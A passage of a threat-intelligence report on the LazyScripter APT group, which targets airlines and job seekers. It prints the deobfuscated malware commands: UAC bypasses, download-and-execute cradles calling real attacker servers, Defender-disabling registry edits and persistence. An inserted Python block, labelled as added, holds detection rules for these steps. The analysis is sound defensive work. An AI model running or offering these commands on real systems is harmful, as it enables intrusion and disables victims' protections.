### Threat Intelligence Report

# LazyScripter: From Empire to double RAT

##### February 2021

Hossein Jazi

## Table of Contents

- Executive Summary
- Introduction
  - Timeline of activities and phishing lures
  - Document analysis
  - Archive analysis
- KOCTOPUS Analysis
  - Batch Variant
  - Ngrok
  - ADS-Backdoor
  - Executable Variant
  - Vbscript Variant
  - Registry key variant
  - Empoder
- Infrastructure
- Attribution
- Conclusion
- Indicators of Compromise (IOCs)
- MITRE ATT&CK techniques

## Executive Summary

Malwarebytes’ Threat Intelligence analysts continually research and monitor active malware campaigns and actor groups as the prevalence and sophistication of targeted attacks rapidly evolve. In this paper, we introduce a new APT group we have named LazyScripter, presenting an in-depth analysis of the tactics, techniques, procedures, and infrastructure employed by this actor group. Although the observed TTPs have commonality with known actor groups, there are many notable differences setting LazyScripter apart from these groups; these similarities and differences are discussed in the Attribution section of this paper.

APT groups are traditionally tracked according to the specific targets and the tools or methodologies they employ. Many actor groups use spam campaigns, attaching weaponized documents to phishing emails themed to target the industry or demographic of interest.
In this case, we initially discovered a number of malicious emails specifically targeting individuals seeking employment, which prompted a deeper investigation. Digging deeper, we uncovered a targeted spam campaign dating back as far as 2018 that used phishing lures with themes aimed not only at those seeking immigration to Canada for employment, but also at airlines.

In the following analysis, we walk through the timeline of observed TTPs from the initial phishing campaign to the current and ongoing activities of the actor. We take a deep dive into each of the tools used, including the weaponized documents and the multiple variants of malware and exploitation techniques employed. Finally, we detail the infrastructure used and discuss the attribution comparisons with known actor groups such as APT28 and Muddy Water.

This in-depth and detailed analysis has revealed a developing campaign by what we believe to be a previously unidentified APT actor. Not only has this campaign been active for several years, but ongoing tracking shows this actor is still maintaining the infrastructure used and is actively updating its toolsets. For this reason, we continue to track this new group, LazyScripter, as the threat evolves.

## Introduction

In late December 2020 we observed a few malicious documents with embedded objects that were designed to target job seekers. The embedded objects were either VBScript or batch files that deployed two open-source multi-stage Remote Access Trojans (RATs): Octopus and Koadic. Interestingly, in some cases the attacker managed to drop other RATs such as LuminosityLink, RMS, Quasar, njRat and Remcos. This triggered our interest to further investigate this threat actor and understand its activities over the past few years. We were able to track them back to at least 2018, with a campaign targeting victims looking to immigrate to Canada.
Over time they have used different file types as their initial lures, and they have switched their main toolset from PowerShell Empire to a double RAT (Koadic and Octopus). This threat actor is targeting the International Air Transport Association (IATA) and airlines: we observed several different lures specifically designed to target airlines that use the BSPLink software. Most recently we observed that they have changed their lure to mimic a new feature recently introduced by IATA called IATA ONE ID (a contactless passenger processing tool). This indicates that this actor is constantly updating its toolsets to target new systems developed by IATA.

## Phishing

In all their phishing lures the actor has used its loader to spawn a combination of Octopus and Koadic (there were only a few cases with Koadic only). We were able to identify several different variants of this loader: executable, batch, VBScript, and registry files (in which persistence is achieved by writing a PowerShell script into the AutoRun registry key). We named this new loader KOCTOPUS. This group also used another loader around 2018 and 2019 to load PowerShell Empire. We named this loader Empoder.

As a phishing lure they mainly used either IATA- or job-related themes to target victims. However, we have observed several other phishing lures used by this actor. Here are some of them:

- IATA security (International Air Transport Association security)
- BSPlink Updater or Upgrade (BSPlink is the global interface for travel agents and airlines to access the IATA Billing and Settlement Plan (BSP))
- IATA ONE ID
- User support kits for IATA users
- Tourism (UNWTO)
- COVID-19
- Microsoft Updates
- Job information
- Canada skilled worker program
- Canada Visa (CanadaVisa.com is the online presence of the Campbell Cohen Immigration Law Firm)

Another interest of this actor is targeting people that want to immigrate to Canada through government job-related programs.
In one specific case the actor used the legitimate "Canadavisa.com" site as its phishing lure. Canadavisa is a known Canadian immigration website associated with an immigration firm based in Montreal, Canada.

This actor has mainly used spam emails weaponized with either archive or document files as its initial infection vector. Both zip and document files contain a variant of either KOCTOPUS or Empoder, and in some cases they are password protected.

The actor has mainly used two GitHub accounts to host its toolsets. Both of these accounts were deleted on Jan 12 and 14, 2021, respectively.

- https://github[.]com/Axella49
- https://github[.]com/LIZySARA

Figure 1: GitHub account belonging to threat actor

The actor created a new GitHub account on Feb 2nd, 2021 to host the payloads for its new spam campaign:

Figure 2: New GitHub repository

###### Timeline of activities and phishing lures

We were able to collect some of the spam emails used by this actor over the past two years. In these spam emails the actor used several methods to redirect the user to download a variant of KOCTOPUS. The latest campaign was spotted on Feb 5th, 2021, in which the actor was distributing a variant of KOCTOPUS pretending to be "BSPLink Upgrade.exe" and managed to drop a variant of Quasar RAT in addition to Octopus and Koadic. Prior to that we spotted another campaign on Jan 6th, 2021 in which the actors were distributing a variant of KOCTOPUS pretending to be the "IATA ONE ID.exe" software:

Figure 3: Latest spam campaign

Figure 4: Latest spam campaign

Here is the list of different lures used by this actor:

- KOCTOPUS has been archived and distributed as an email attachment to victims.

Figure 5: Spam email variant 1

Figure 6: Spam email variant 2

- The spam email contains a PDF file with a link to download a variant of KOCTOPUS.
Figure 7: Spam email variant 3

Figure 8: Attached PDF file

- The spam email contains a link that redirects the victim to download KOCTOPUS or a maldoc that has an embedded KOCTOPUS. The link is usually a URL-shortener link (using services such as bit.ly or cutt.ly) that redirects victims to either the attackers’ GitHub repository or the IP/URL address that hosts the maldoc.

Figure 9: Spam email variant 3

On March 19th, 2020, the SANS ISC InfoSec Forums reported a multistage attack that took advantage of the COVID-19 pandemic to distribute its malware. That reported maldoc contains a variant of the KOCTOPUS malware we uncover in this paper. In that phishing email the actor spoofed the World Health Organization and pretended to provide recommendations.

We were able to identify multiple themes used by this actor and the times they have been used in spam campaigns. The following image shows the time frames of the different lures used by the actor.

Figure 10: Lures timeline

###### Document analysis

Unlike most actors, who use macros in their documents to perform malicious activities, this actor has embedded objects that are one of the KOCTOPUS or Empoder variants. We identified 14 malicious documents that have been used by this actor since 2018:

Figure 11: List of maldocs used by this actor

The malicious documents usually have one or two embedded objects with either PDF, Microsoft Word or Excel icons to pretend they are another document embedded in the doc, while in fact they are either batch, executable, or VBScript variants of KOCTOPUS or Empoder.

Figure 12: Doc Template 1

Figure 13: Doc Template 2

###### Archive analysis

The actor has not only relied on maldocs to deliver its loaders but also used archive files that embed a variant of KOCTOPUS or Empoder.
The following shows the list of archive lures used by this actor since 2018:

Figure 14: List of archive files and their embedded objects

## KOCTOPUS Analysis

The actor has used this loader to load Octopus and Koadic and in some cases other RATs such as LuminosityLink, RMS and Quasar RAT. This loader has four different variants, which we describe below.

###### Batch Variant

The batch files used by this actor are highly obfuscated with the BatchEncryption tool. BatchEncryption is an advanced batch obfuscation tool that uses a combination of known and custom environment-variable encoding techniques.

Figure 15: Overall Process

In this section we provide the analysis of a batch file embedded within the most recent maldoc used by this actor. The following shows the obfuscated version of KOCTOPUS:

Figure 16: KOCTOPUS Batch Variant Obfuscated

Figure 17 shows the list of commands that will be executed by this loader after de-obfuscation.

Figure 17: KOCTOPUS Batch Variant Not Obfuscated

This loader starts its activities by checking the OS version using the following command:

```
for /f "tokens=2 delims=," %%i in ('wmic os get caption^,version /format:csv') do set os=%%i
```

Then it looks for the number 10 using the find command to identify whether the OS is Windows 10. If that is the case, it attempts to bypass User Account Control (UAC) using fodhelper.exe and execute its commands with higher privilege. If the OS version is not 10, it performs the UAC bypass through Event Viewer (eventvwr.exe).

Fodhelper.exe is used in Windows 10 to manage language settings. Since this process runs with the highest privilege, an attacker can abuse it to execute malicious commands with the same privilege fodhelper has. When the fodhelper.exe process starts it looks for the three registry keys shown below, which by default do not exist. Therefore, an attacker can write its malicious commands into these registry keys to be executed by fodhelper.exe with the highest privilege.
```
HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute
HKCU:\Software\Classes\ms-settings\shell\open\command\(default)
```

The loader creates these registry keys with reg add, setting the command's default value to a PowerShell download cradle:

```
&& reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
&& reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://23.98.155.192/sc.bat',, 'C:\Users\Public\Libraries\sc.bat');\" C:\Users\Public\Libraries\sc.bat" /f
```

To trigger the PowerShell command, fodhelper.exe is then executed:

```
&& START /W fodhelper.exe
```

Upon fodhelper execution, PowerShell downloads a batch file from a remote server, saves it into the Libraries directory and finally executes it. At the end the loader performs its cleanup by deleting the created registry keys with the following command:

```
&& reg delete HKCU\Software\Classes\ms-settings /f
```

If the OS version is not 10, Event Viewer is used to bypass UAC. When eventvwr.exe is executed it looks for mmc.exe in these two registry locations:

```
HKCU\Software\Classes\mscfile\shell\open\command
HKCR\mscfile\shell\open\command
```

Since the first registry key does not exist, mmc.exe is executed from the second location to load the eventvwr.msc file and display the information to the user. An attacker can create the missing first key in order to execute malicious commands with administrative privileges. In this case the actor created this registry key with the same PowerShell download cradle described in the fodhelper.exe bypass.
```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://23.98.155.192/sc.bat', 'C:\Users\Public\Libraries\sc.bat');\" C:\Users\Public\Libraries\sc.bat" /f
```

The downloaded batch file (sc.bat) has also been obfuscated using the BatchEncryption tool. After deobfuscation we can see this batch performs the following steps:

- Using reg.exe to disable, add or delete all registry keys related to Microsoft Defender and Microsoft Security Essentials. It also disables all the scheduled tasks related to these security products by calling schtasks:

```
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
```

- Calling PowerShell.exe to download another batch file. The actor used another URL shortener, "is.gd", which redirects to a GitHub repository to download that batch file:

```
powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://is.gd/xbQIQ2','C:\Users\Public\Libraries\pus.bat');" C:\Users\Public\Libraries\pus.bat
```

The pus.bat script is also obfuscated by the BatchEncryption tool and executes the following PowerShell command. This command connects to the actor's server to deploy its first multi-stage RAT, which is Octopus:

```
powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');"
```

- Performing the following actions, which establish persistence for both Octopus and Koadic through both the AutoRun registry key and a scheduled task.
###### Koadic Persistence:

```
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDrive" /t REG_SZ /d "cmd /c powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');\""
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticChromeUpdater /TR 'mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate' /SC minute /mo 60}
"C:\WINDOWS\system32\schtasks.exe" /create /TN AutomaticChromeUpdater /TR "mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate" /SC minute /mo 60
```

###### Octopus Persistence:

```
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "New Value #1" /t REG_SZ /d "mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate" /f
powershell Add-MpPreference -ExclusionPath "C:" -FORCE
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticU /TR 'C:\Users\Public\Libraries\pus.bat' /SC minute /mo 120}
"C:\WINDOWS\system32\schtasks.exe" /create /TN AutomaticU /TR C:\Users\Public\Libraries\pus.bat /SC minute /mo 120
```

The first PowerShell command downloads the Octopus PowerShell agent from the following URL: http://hpsj[.]firewall-gateway[.]net:80/hpjs.php. This agent has been obfuscated by the attacker.

Figure 18: Loading Koadic

The Octopus agent is responsible for communicating with its C&C server to send and receive commands.
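The batch chain described so far (UAC bypass through the ms-settings and mscfile command keys, Defender tampering, download cradles into C:\Users\Public\Libraries, and Run-key and scheduled-task persistence) leaves a consistent trail in process-creation telemetry. The following Python rules, an added example and not code from the report, run over constructed Sysmon-style command lines; the C2 host, IP and shortener paths are placeholders, and the ATT&CK technique ids are attached here for triage context.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str      # MITRE ATT&CK technique id, attached for triage context
    pattern: re.Pattern


# One rule per step of the deobfuscated KOCTOPUS batch chain; all case-insensitive.
RULES: List[Rule] = [
    Rule("uac_bypass_registry_hijack", "T1548.002",   # ms-settings / mscfile command keys
         re.compile(r"reg(\.exe)?\s+add\s+\"?hkcu\\software\\classes\\(ms-settings|mscfile)\\shell\\open\\command", re.I)),
    Rule("uac_bypass_auto_elevate_launch", "T1548.002",
         re.compile(r"\b(fodhelper|eventvwr)\.exe\b", re.I)),
    Rule("defender_policy_tamper", "T1562.001",
         re.compile(r"reg(\.exe)?\s+(add|delete)\s+\"?hklm\\software\\policies\\microsoft\\windows defender", re.I)),
    Rule("defender_service_disabled", "T1562.001",   # Start=4 (disabled) on Defender services
         re.compile(r"services\\(wdboot|wdfilter|wdnisdrv|wdnissvc|windefend|securityhealthservice)\"?\s+/v\s+\"?start\"?.*?/d\s+\"?4", re.I)),
    Rule("defender_task_disabled", "T1562.001",
         re.compile(r"schtasks\s+/change\s+/tn\s+\"microsoft\\windows\\(windows defender|exploitguard)", re.I)),
    Rule("defender_exclusion_added", "T1562.001",
         re.compile(r"add-mppreference\s+-exclusionpath", re.I)),
    Rule("lua_disabled", "T1562.001",
         re.compile(r"policies\\system\s+/v\s+enablelua\s+/t\s+reg_dword\s+/d\s+0", re.I)),
    Rule("download_cradle_to_public_libraries", "T1105",
         re.compile(r"net\.webclient\)\.download(file|string)\(.*?c:\\users\\public\\libraries\\", re.I)),
    Rule("shortener_download", "T1105",
         re.compile(r"https?://(cutt\.ly|is\.gd|bit\.ly)/", re.I)),
    Rule("runkey_persistence_remote_script", "T1547.001",
         re.compile(r"currentversion\\run\"?\s+/v\s+.*?(mshta|downloadstring)", re.I)),
    Rule("schtasks_persistence_mshta_or_bat", "T1053.005",
         re.compile(r"schtasks(\.exe\"?)?\s+/create\s+/tn\s+\S+\s+/tr\s+.*?(mshta\s+https?://|\.bat)", re.I)),
]

# Constructed process-creation command lines modelled on the deobfuscated loader.
# Hosts, IPs and shortener paths are placeholders, not the report's indicators.
SAMPLE_EVENTS = [
    r"""reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://203.0.113.10/sc.bat', 'C:\Users\Public\Libraries\sc.bat');\" C:\Users\Public\Libraries\sc.bat" /f""",
    r"START /W fodhelper.exe",
    r"""reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f""",
    r"""schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable""",
    r"""reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f""",
    r"""reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f""",
    r"""powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://is.gd/PLACEHOLDER','C:\Users\Public\Libraries\pus.bat');" C:\Users\Public\Libraries\pus.bat""",
    r"""reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDrive" /t REG_SZ /d "cmd /c powershell -w hidden \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid:80/hpjs.php');\"" /f""",
    r"""powershell Add-MpPreference -ExclusionPath "C:" -FORCE""",
    r'''"C:\WINDOWS\system32\schtasks.exe" /create /TN AutomaticChromeUpdater /TR "mshta http://c2.example.invalid:8080/MicrosoftUpdate" /SC minute /mo 60''',
]


def match_rules(cmdline: str) -> List[str]:
    """Names of every rule that fires on one command line, in RULES order."""
    return [r.name for r in RULES if r.pattern.search(cmdline)]


def triage(events: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious event to the rule names it fired; clean events are dropped."""
    hits: Dict[str, List[str]] = {}
    for ev in events:
        names = match_rules(ev)
        if names:
            hits[ev] = names
    return hits


def chain_score(events: List[str], threshold: int = 3) -> Tuple[int, bool]:
    """Count distinct rules fired across one host's events. The loader runs all of its
    steps within minutes, so several distinct rules on one host is the alert condition;
    a single hit (fodhelper launched right after the ms-settings key was written) is
    still worth a look, because that key does not exist on a healthy system."""
    fired = {name for ev in events for name in match_rules(ev)}
    return len(fired), len(fired) >= threshold


if __name__ == "__main__":
    for ev, names in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(names):55s} <- {ev[:60]}")
    print("distinct rules fired, alert:", chain_score(SAMPLE_EVENTS))
```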
To start its communications, the Octopus agent collects the following information from the victim machine:

- Host name (with five random characters appended to the end)
- User name (if the user has the administrator role, "*" is appended to it)
- OS version
- OS architecture
- The process ID that is executing this PowerShell script
- Victim’s network domain

Then it builds a header with the following format:

```
$HEADER = "$hostname, $username, $OS_version, $OS_arch, $process_id, $domain"
```

In the next step, it encrypts the header using AES and then Base64-encodes the resulting ciphertext. The key and IV for encryption are hardcoded as Base64 strings.

Figure 19: Encryption function

Then it sends an HTTP GET request to its server with the generated header in the Authorization header field.

Figure 20: Http get request

After sending the request, it goes into a loop to receive commands from the server. The received commands are specific to the victim, and the generated URL is the combination of the C&C URL and the generated host name. The received commands are Base64-encoded and AES-encrypted, so the agent first decodes and decrypts them and then performs the required actions based on their content.

Figure 21: Commands

Here is the list of commands:

- False: If the command is False it does nothing.
- Report: It collects the victim’s info, including the list of all running processes, local IP address, OS version, last boot time, OS locale and current time, then encrypts and Base64-encodes them and sends them in the Authorization HTTP field to the server.
- Download: Uploads the content of a specified file to the server.
- reset-pc: This feature does not seem to be implemented yet.

It also deploys another variant of the Octopus agent through JavaScript (mshta http://hpsj[.]firewall-gateway[.]net:8080/hta).
This script calls PowerShell to download the Octopus agent.

Figure 22: Js script

Figure 23: PowerShell command after deobfuscation

After deploying Octopus it deploys Koadic by calling mshta:

```
"mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate" /f
powershell Add-MpPreference -ExclusionPath "C:" -FORCE
```

The actor has used mshta and rundll32.exe for the Koadic stagers.

```
"C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?PPVXCF8Y4U=2368b7b9facb4a3b8acf72d29ea28704;UGH09GLI5P=;\..\..\..\./mshtml,RunHTMLApplication
```

Figure 24 shows the downloaded first stage. This script defines 4 random strings with the following lengths: 101, 118, 97, and 108. These lengths are used to build the string "eval" by converting each length to its character (101 = "e", 118 = "v", 97 = "a", 108 = "l"). In the next step the obfuscated script that will be executed by eval is deobfuscated by passing it to the deobfuscation function (jRclebKBKY). At the end the deobfuscated script is executed by calling eval.

Figure 24: Downloaded js

Figure 25: Deobfuscated js

The deobfuscated script collects the following information from the victim, then builds a URL and command and makes an HTTP request to the Koadic server:

- Checks SeDebugPrivilege through the "whoami /all" command
- Gets OS version and build by reading their respective registry locations
- Gets group policy history by reading a registry location
- Gets processor architecture
- Lists directories in the temp folder
- Gets the contents of the IP routing table by executing the "route print" command
- Gets computer name and username
- Gets Windows code page

Figure 26: Data collection

In this case, we observed that Koadic acted as a downloader to download and execute RMS and LuminosityLink. In some other cases, the actor used Koadic to drop njRat, Remcos and Quasar RAT.
```
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command "& { (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0hakgDJ', 'C:\Users\Public\Libraries\1.exe')};" C:\Users\Public\Libraries\1.exe
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command "& { (New-Object Net.WebClient).DownloadFile('https://cutt.ly/agV2Ekk', 'C:\Users\Public\Libraries\Setup-RMS.exe')};" C:\Users\Public\Libraries\Setup-RMS.exe
```

```
@echo off
taskkill /f /im rutserv.exe
taskkill /f /im rfusclient.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
attrib +s +h "C:\Windows\System32\vipcatalog"
cd C:\Windows\System32\vipcatalog\
"rutserv.exe" /silentinstall
regedit /s regedit.reg
"rutserv.exe" /start
@exit
```

###### Ngrok

We have observed some other variants of KOCTOPUS where the actor first deployed a modified version of [Invoke-Ngrok](https://github.com/benyG/Invoke-Ngrok), a PowerShell script that exposes local ports of a victim over the internet. This script has an embedded Base64-encoded payload that is decoded and stored in the Libraries directory pretending to be RuntimeBroker.exe. This dropped payload achieves persistence through the AutoRun registry key and a scheduled task. After deploying Ngrok, the loader deploys both the Octopus and Koadic RATs.

Figure 27: Invoke Ngrok

###### ADS-Backdoor

In another case, we observed that the actor tried to use the ADS-Backdoor, which is a backdoor persistence module of the [Nishang](https://github.com/samratashok/nishang) framework. Nishang is an open-source PowerShell-based framework for offensive security, penetration testing, and red teaming.
```
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://cutt.ly/nfPs6qP'); Checking -URL https://cutt.ly/0fPs6VQ -Arguments "CHECK""
```

Figure 28: ADS-Backdoor

###### Executable Variant

We were able to find 7 executables associated with KOCTOPUS. All of these executables have been compiled using PureBasic, have the same compile date (February 1st, 2018), and almost all of them were recently uploaded to VirusTotal. Having the same compile time might indicate that they have been developed or modified by an automated tool. After further analysis we identified that all of these samples were generated using a Bat to Exe Converter tool. In fact, the actor used a tool to convert its batch loader to an executable. The compile time is predefined in this application and does not reflect the real compilation time. We believe the real compilation time is around the time each sample was uploaded to VirusTotal.

Figure 29: Bat to Exe converter

The samples use different names to pretend they are legitimate applications. Here are some of the names used by these samples:

- "IATA ONE ID.exe": This has been distributed through a spam campaign on Jan 6th, 2021. It uses the IATA ONE ID icon to pretend it is that software. ONE ID is a fairly recent concept introduced by IATA for contactless identity management that leverages biometric technology. This indicates that this actor is constantly monitoring new IATA technologies to update its toolsets accordingly.
- "BSPlinkUpdaterV4.exe": Similar to "IATA ONE ID", this has been specifically designed to target airlines that use the BSPLink software.
- "Federal Skilled Worker Program Eligible Occupations Canada Immigration and Visa Information Canada.exe": This is designed to target people that are applying to the Canada skilled worker program. The actor has used decoy documents from a Canada Immigration website (Figure 30 and Figure 31).
Figure 30: Decoy document

Figure 31: Decoy document

The actor has used several different icons for these executables. Among them we observed one that is an old Malwarebytes icon, possibly pretending to be our security software.

Figure 32: Used icons

This Bat to Exe Converter encrypts the batch loader into its resource section. The executable loads the resource, decrypts its content and then executes the batch file. Here is the main process of this loader:

- It creates a directory in the %APPDATA%/Temp directory and then creates a batch file in that directory. The names of the directory and batch file are generated randomly.

Figure 33: Create Directory

- It looks for resources by their hashes and loads them using the LoadResource API call. This executable contains 2 resources. One of them is used to generate a key for the RC4 encryption algorithm. The other one is the encrypted batch file content.

Figure 34: Load Resource

- It generates the RC4 key from the resource.
- It decrypts the content of the other resource and writes it into the created batch file. (The encryption key is 6A2148ADADF8D6E529B08D8BD0800A85.)
- It calls cmd.exe to execute the generated bat file using CreateProcessW.

Figure 35: RC4 decryption

###### Vbscript Variant

The KOCTOPUS VBScript variant has the same functionality as the batch variant described above, with the difference that process execution is started by a VBScript that calls wscript to execute a PowerShell command. This PowerShell command downloads the batch variant of KOCTOPUS. All of the VBScript files are obfuscated to make analysis more difficult. In the VBScript variant, the actor used the URL shortener cutt.ly to hide its real URL, which in this case is a GitHub repository hosted at raw.githubusercontent.com.
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://cutt.ly/fgOTMj0',, 'C:\Users\Public\Libraries\reguac.bat');" C:\Users\Public\Libraries\reguac.bat
```

###### Registry key variant

This variant sets the AutoRun registry key with a PowerShell command that downloads and executes the batch variant of KOCTOPUS.

Figure 36: Reg variant

###### Empoder

Prior to using Koadic as its main RAT this actor used PowerShell Empire as its main toolset. To load PowerShell Empire the actor used its Empire loader, which we call Empoder.

Figure 37: WinRAR installer

In fact, the actor has just used a VBS file to load PowerShell Empire, but it wrapped its VBS into a WinRAR installer which is usually bundled with a decoy document. As an example, "Canada Visa.exe" is a WinRAR installer that has two bundled files: a VBS file and a decoy PDF document. This one is specifically designed to target users of Canada Visa, a Canadian immigration law firm based in Montreal, Canada. The decoy document was taken from the Canada Visa website.

Figure 38: Canada Visa decoy document

## Infrastructure

The actor has leveraged dynamic DNS providers for command-and-control communications. Dynamic DNS providers allow people to create free subdomains on shared domains, and as you can see the actor has created five subdomains on four different dynamic DNS domains for its communications:

- kasperskylab.ignorelist.com
- hpsj.firewall-gateway.net
- googlechromeupdater.twilightparadox.com
- iatassl-telechargementsecurity.duckdns.org
- stub.ignorelist.com

Figure 39: Infrastructure

## Attribution

We have examined the TTPs, toolsets and infrastructure used by this actor to attribute it to any of the known threat actors. Even though some similarities between this actor and documented APT actors such as APT28 and OilRig exist, these indicators are not enough to attribute it to any of these groups.
- [APT28](https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/) has used Koadic RAT in its past campaigns; the only similarity between them is the use of the Koadic open-source tool, which is not a strong indicator of any connection between them.
- [OilRig](https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/) has used the Bat to Exe tool to convert its PowerShell scripts into executables. This is a good indicator that there is some overlap between this actor and OilRig, but there are still some major differences between them that make us believe they are separate groups.

The most similar APT actor to the actor we analyzed in this report is Muddy Water. Here is the list of similarities between them:

- Both have used Koadic and Empire in their previous campaigns
- Both have used scripting languages such as PowerShell in their campaigns
- Both have used GitHub to host their malicious payloads/scripts.
  Like Muddy Water, this actor has also added forks of popular toolsets to its GitHub account to lend it legitimacy
- Both have used scheduled tasks and Registry Run Keys / Startup Folder for persistence

However, there are key differences:

